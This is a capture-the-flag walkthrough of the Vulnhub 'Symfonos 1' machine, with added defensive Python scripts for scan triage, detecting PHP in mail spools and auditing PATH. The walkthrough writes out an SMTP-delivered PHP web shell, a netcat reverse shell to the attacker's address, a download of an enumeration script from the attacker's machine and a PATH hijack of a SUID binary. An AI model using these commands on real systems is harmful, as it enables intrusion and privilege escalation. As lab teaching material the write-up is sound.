Symfonos 1

Symfonos 1 Vulnhub Walkthrough

Enumeration

nmap

nmap -sC -sV -oA nmap/sym1 192.168.1.112
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 06:26 EDT
Nmap scan report for 192.168.1.112
Host is up (0.00017s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:04:0F:D1 (VMware)
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 1s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos
|   NetBIOS computer name: SYMFONOS\x00
|   Domain name: \x00
|   FQDN: symfonos
|_  System time: 2020-05-15T05:27:13-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-15T10:27:13
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.31 seconds
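Before moving on, it is worth noting what this scan already tells a defender: SMTP advertises VRFY (which is how the helios account is confirmed later), and Samba accepts a guest session and does not require message signing. The script below is an added example, not part of the original walkthrough: it parses a constructed excerpt of the report above and prints each open port together with the weak settings and the configuration change that removes each one. The function names and the excerpt are this example's own.

```python
"""Triage an nmap -sC -sV text report for weak service settings.

Added example, not from the original walkthrough: it parses a constructed
excerpt of the scan output above and flags the settings that made later
steps possible. All function names here are this example's own.
"""
import re

# Constructed excerpt of the scan report shown above (sample input, not a live scan).
SAMPLE_REPORT = """\
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

# "22/tcp  open  ssh  OpenSSH 7.4p1 ..." -> port, proto, state, service, version
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Each check: (regex over the whole report, finding text, mitigation)
CHECKS = [
    (r"smtp-commands:[^\n]*\bVRFY\b",
     "SMTP VRFY enabled: valid local mailboxes (e.g. helios) can be confirmed remotely",
     "Postfix: disable_vrfy_command = yes"),
    (r"message_signing:\s*disabled",
     "SMB1 message signing disabled",
     "Samba: server signing = mandatory"),
    (r"Message signing enabled but not required",
     "SMB2 message signing not required",
     "Samba: server signing = mandatory"),
    (r"account_used:\s*guest",
     "Samba accepted a guest session for enumeration",
     "Samba: map to guest = Never, and guest ok = no on each share"),
]


def parse_open_ports(report):
    """Return one dict per open port found in the PORT/STATE/SERVICE table."""
    ports = []
    for line in report.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(3) == "open":
            ports.append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "service": m.group(4),
                "version": m.group(5).strip(),
            })
    return ports


def find_findings(report):
    """Return (finding, mitigation) pairs for every CHECKS pattern present."""
    return [(text, fix) for pattern, text, fix in CHECKS if re.search(pattern, report)]


if __name__ == "__main__":
    for p in parse_open_ports(SAMPLE_REPORT):
        print(f"{p['port']}/{p['proto']:<4} {p['service']:<12} {p['version']}")
    for finding, fix in find_findings(SAMPLE_REPORT):
        print(f"[!] {finding}\n    fix: {fix}")
```

The same parser works on the .nmap file written by -oA; point it at nmap/sym1.nmap instead of the embedded excerpt to triage the real report.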

When I open the IP address in the browser, it shows this

Nothing interesting from dirb either, so let's use enum4linux to see what we can find

enum4linux

As we can see here, there are two shares, helios and anonymous, that we can check out

smbclient

We can type

smbclient //192.168.1.112/anonymous and, with an empty password, we can log in.

Then type ls to list everything inside that share.

Then we can type get attention.txt to download the file.

Then we can cat the file to show the text inside.

This might be the password for the helios share.

So then in the terminal, type

smbclient //192.168.1.112/helios -U helios, then enter the password qwerty.

List the files again using ls and we get two text files, research.txt and todo.txt.

Open those two text files and we get this

We can see that there is a /h3l105 path at the end of todo.txt, so we can put it into the web browser now.

We can see that the site does not load properly; I immediately know that we need to add the IP to /etc/hosts.

Reload the webpage

We can see that the site is powered by WordPress, so we use wpscan to enumerate it and find out whether it has any vulnerabilities.

wpscan

We type this inside the terminal

It is recommended to use the symfonos.local hostname that we created in /etc/hosts, because otherwise we might miss something important while scanning with wpscan.

(p stands for popular plugins.)

Exploit

After Googling for a while, I found out that mail-masta is vulnerable to Remote Code Execution (RCE); the exploit can be found on exploit-db.

Replace the URL with the query provided and we will get this

From here, we know that there is a user called helios.

I know that Postfix stores each user's mail at /var/mail/username.

curl

Log Poisoning via Mail

We can actually send PHP code to the victim's mailbox to get a shell.

telnet

Using telnet, we can type

Then we can type

MAIL FROM:<choo>

RCPT TO:helios

data

<?php system($_GET['cmd']); ?>

.

After that, go back to the browser and put /var/mail/helios&cmd=id after the pl= parameter.

We can see that we successfully get a shell!

Reverse Shell

Type nc -nlvp 4444 on our machine, then nc -e /bin/bash 192.168.43.182 4444 in the URL.

Got a connection!

Then we need to type

python -c 'import pty; pty.spawn("/bin/bash")' to get a proper shell.
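What the telnet session above leaves behind is a message in the helios mail spool whose body is a PHP open tag; the web application then includes that spool and executes it. For a defender, the spool (and, for the same reason, the Apache access and error logs) is therefore something to scan. The script below is an added example and not part of the original walkthrough: it splits an mbox-format spool into messages and reports every message carrying a PHP open tag in its headers or body. The spool text is constructed to resemble what the session above would produce; the sender address, timestamps, Received header and function names are this example's own.

```python
"""Scan a Postfix mbox spool for injected PHP, the trace of the log-poisoning
step above.

Added example (not from the original walkthrough). It works on a constructed
mbox text modelled on what the telnet session above would leave in
/var/mail/helios; the header values are made up. Function names are this
example's own.
"""
import email
import re

# Constructed spool content: one ordinary message, then one carrying PHP tags.
SAMPLE_SPOOL = """\
From root@symfonos.localdomain  Fri May 15 05:01:02 2020
Return-Path: <root@symfonos.localdomain>
Delivered-To: helios@symfonos.localdomain
From: root@symfonos.localdomain
Subject: Cron <helios@symfonos> backup

Backup finished.

From choo@symfonos.localdomain  Fri May 15 06:40:12 2020
Return-Path: <choo@symfonos.localdomain>
X-Original-To: helios
Delivered-To: helios@symfonos.localdomain
Received: from unknown (localhost [127.0.0.1])
        by symfonos.localdomain (Postfix) with SMTP id C0FFEE
        for <helios>; Fri, 15 May 2020 06:40:12 -0500 (CDT)

<?php system($_GET['cmd']); ?>

"""

# mbox separates messages with a line that starts with "From " (note the space,
# which distinguishes it from the "From:" header).
MBOX_SPLIT = re.compile(r"^From (\S+)\s+(.*)$", re.MULTILINE)

# PHP open tags: "<?php" and the short echo form "<?=", any case.
PHP_TAG = re.compile(r"<\?(php\b|=)", re.IGNORECASE)


def split_mbox(text):
    """Yield (envelope_sender, message_text) for each message in an mbox string."""
    starts = list(MBOX_SPLIT.finditer(text))
    for i, m in enumerate(starts):
        end = starts[i + 1].start() if i + 1 < len(starts) else len(text)
        yield m.group(1), text[m.end():end].lstrip("\n")


def find_poisoned_messages(text):
    """Return one dict per message whose raw text (headers included) holds a PHP tag.

    Headers are searched too because a HELO name or Subject is just as
    includable as the body once the file is pulled in by a file-inclusion bug.
    """
    hits = []
    for sender, raw in split_mbox(text):
        m = PHP_TAG.search(raw)
        if not m:
            continue
        msg = email.message_from_string(raw)
        line_start = raw.rfind("\n", 0, m.start()) + 1
        line_end = raw.find("\n", m.start())
        line_end = len(raw) if line_end == -1 else line_end
        hits.append({
            "sender": sender,
            "subject": msg.get("Subject", ""),
            "line": raw[line_start:line_end].strip(),
        })
    return hits


if __name__ == "__main__":
    for hit in find_poisoned_messages(SAMPLE_SPOOL):
        print(f"[!] PHP tag in mail from {hit['sender']}: {hit['line']}")
```

Finding such a message is a detection, not the fix: the underlying problem is a web application that includes a path taken from a request parameter, and a spool that the web server user is allowed to read.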

Privilege Escalation

LinEnum

You can download the script here

Then we can fire up a Python HTTP server by typing

python -m SimpleHTTPServer

Then, on the victim's machine, we can type wget 192.168.43.182:8000/LinEnum.sh

After that, chmod +x LinEnum.sh to make it executable, and type ./LinEnum.sh to run the script.

PATH variable exploit

Looking at the SUID files listed by LinEnum.sh, we can see that /opt/statuscheck is very suspicious.

After running it, we can see that its output is generated by curl. Then we use the strings command to show what's inside the binary file.

As we can see here, there is a curl command; if we run curl -I http://localhost, we get something familiar.

The binary calls curl by its bare name, so we can supply our own curl and use the PATH variable to make the exploit work.

We first head to the /tmp folder.

Then type

echo "/bin/sh" >> curl

Then we can chmod 777 curl

Then prepend /tmp to the PATH by typing

export PATH=/tmp:$PATH

Then we can run /opt/statuscheck

We got root!

Navigate to /root to get the flag.

Congratulations!
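The root cause here is a privileged program that runs a command by its bare name and inherits the caller's PATH, so whichever directory comes first in PATH decides what actually executes. The script below is an added example, not code from the walkthrough or the VM: instead of /opt/statuscheck it creates a throwaway directory holding a harmless stand-in curl script, shows which file a PATH lookup returns with and without that directory in front, and lists the PATH entries the current user could write to. The fixed PATH value and all function names are this example's own assumptions.

```python
"""Show how a bare command name in a privileged program resolves through PATH,
and audit PATH for entries the current user can write to.

Added example, not from the walkthrough or the VM. Instead of the VM's
/opt/statuscheck it builds a temporary directory with a harmless stand-in
`curl` script; all names here are this example's own.
"""
import os
import shutil
import stat
import tempfile

# Assumed "safe" PATH a privileged program should use, regardless of what it inherited.
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def writable_path_entries(path_str):
    """Return the PATH directories the current user could drop a file into."""
    return [d for d in path_str.split(":")
            if d and os.path.isdir(d) and os.access(d, os.W_OK)]


def resolve_command(cmd, path_str):
    """Where a shell, system() or execvp() would find `cmd` given this PATH."""
    return shutil.which(cmd, path=path_str)


def hardened_env():
    """Environment a privileged program should exec children with: a fixed PATH,
    nothing inherited from the caller."""
    return {"PATH": TRUSTED_PATH}


def demo():
    """Recreate the lookup in a temp dir: a writable directory first in PATH wins."""
    with tempfile.TemporaryDirectory() as tmp:
        fake = os.path.join(tmp, "curl")
        with open(fake, "w") as fh:
            # Harmless stand-in: it only announces itself.
            fh.write("#!/bin/sh\necho \"stand-in curl at $0\"\n")
        os.chmod(fake, os.stat(fake).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
        attacker_path = tmp + ":" + TRUSTED_PATH
        return {
            "tmpdir": tmp,
            "hijacked": resolve_command("curl", attacker_path),   # the stand-in
            "trusted": resolve_command("curl", TRUSTED_PATH),     # the real one, or None
            "writable": writable_path_entries(attacker_path),
        }


if __name__ == "__main__":
    r = demo()
    print("writable dir first in PATH ->", r["hijacked"])
    print("fixed PATH                 ->", r["trusted"] or "(no curl installed)")
    print("writable PATH entries       :", r["writable"])
```

The durable fix for a binary like /opt/statuscheck is to call /usr/bin/curl by absolute path and to exec with an environment of its own (as hardened_env illustrates) rather than the caller's; the audit function is the check to run on any account whose PATH a SUID program might inherit.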
